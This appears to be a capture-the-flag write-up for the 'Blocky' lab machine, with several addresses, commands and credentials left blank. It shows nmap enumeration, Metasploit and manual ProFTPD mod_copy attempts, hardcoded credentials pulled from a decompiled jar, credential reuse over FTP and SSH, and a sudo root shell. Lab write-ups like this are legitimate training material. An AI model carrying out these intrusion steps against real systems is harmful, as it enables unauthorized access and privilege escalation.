Nmap scan report for
Host is up (0.12s latency).
Not shown: 996 filtered ports
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos

Running the scan against all ports shows:

21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft


Anonymous FTP login doesn’t work:

─$ ftp
Connected to
220 ProFTPD 1.3.5a Server (Debian) [::ffff:]
Name ( anonymous
331 Password required for anonymous
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.

Searchsploit reveals that there are two potential RCE exploits that could work:

ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                              | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                    | linux/remote/36803.py

The initial run of the msf exploit doesn’t work:

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 
[*] - - Connected to FTP server
[*] - - Sending copy commands to FTP server
[-] - Exploit aborted due to failure: unknown: - Failure copying from /proc/self/cmdline
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > 

Looking at the packets shows that the FTP server requires creds before it accepts the SITE CPFR command:


220 ProFTPD 1.3.5a Server (Debian) [::ffff:]

SITE CPFR /proc/self/cmdline

530 Please login with USER and PASS

Port 80

We are greeted by a standard WordPress site.

We can enumerate users by doing

This gives us posts made by Notch. Incrementing the author ID by 1 doesn’t yield any results.

From the gobuster run, we visit

There we can download 2 jar files.

We can decompile the jar files with tools from Java Decompiler.

We begin by examining BlockyCore.jar with jd-gui.

└─$ java -jar jd-gui-1.6.6.jar
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

From the look of it, SQL creds appear to be hardcoded in the jar file.

We try this password with the user name notch on FTP:

Connected to
220 ProFTPD 1.3.5a Server (Debian) [::ffff:]
Name ( notch
331 Password required for notch
230 User notch logged in
Remote system type is UNIX.
Using binary mode to transfer files.

Looks like we got a set of valid creds:

And the directory listing looks like the home directory of notch.

Trying these creds via SSH gives us a shell as well as the user flag.

Running sudo -l shows that we can run anything with sudo.

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo bash -p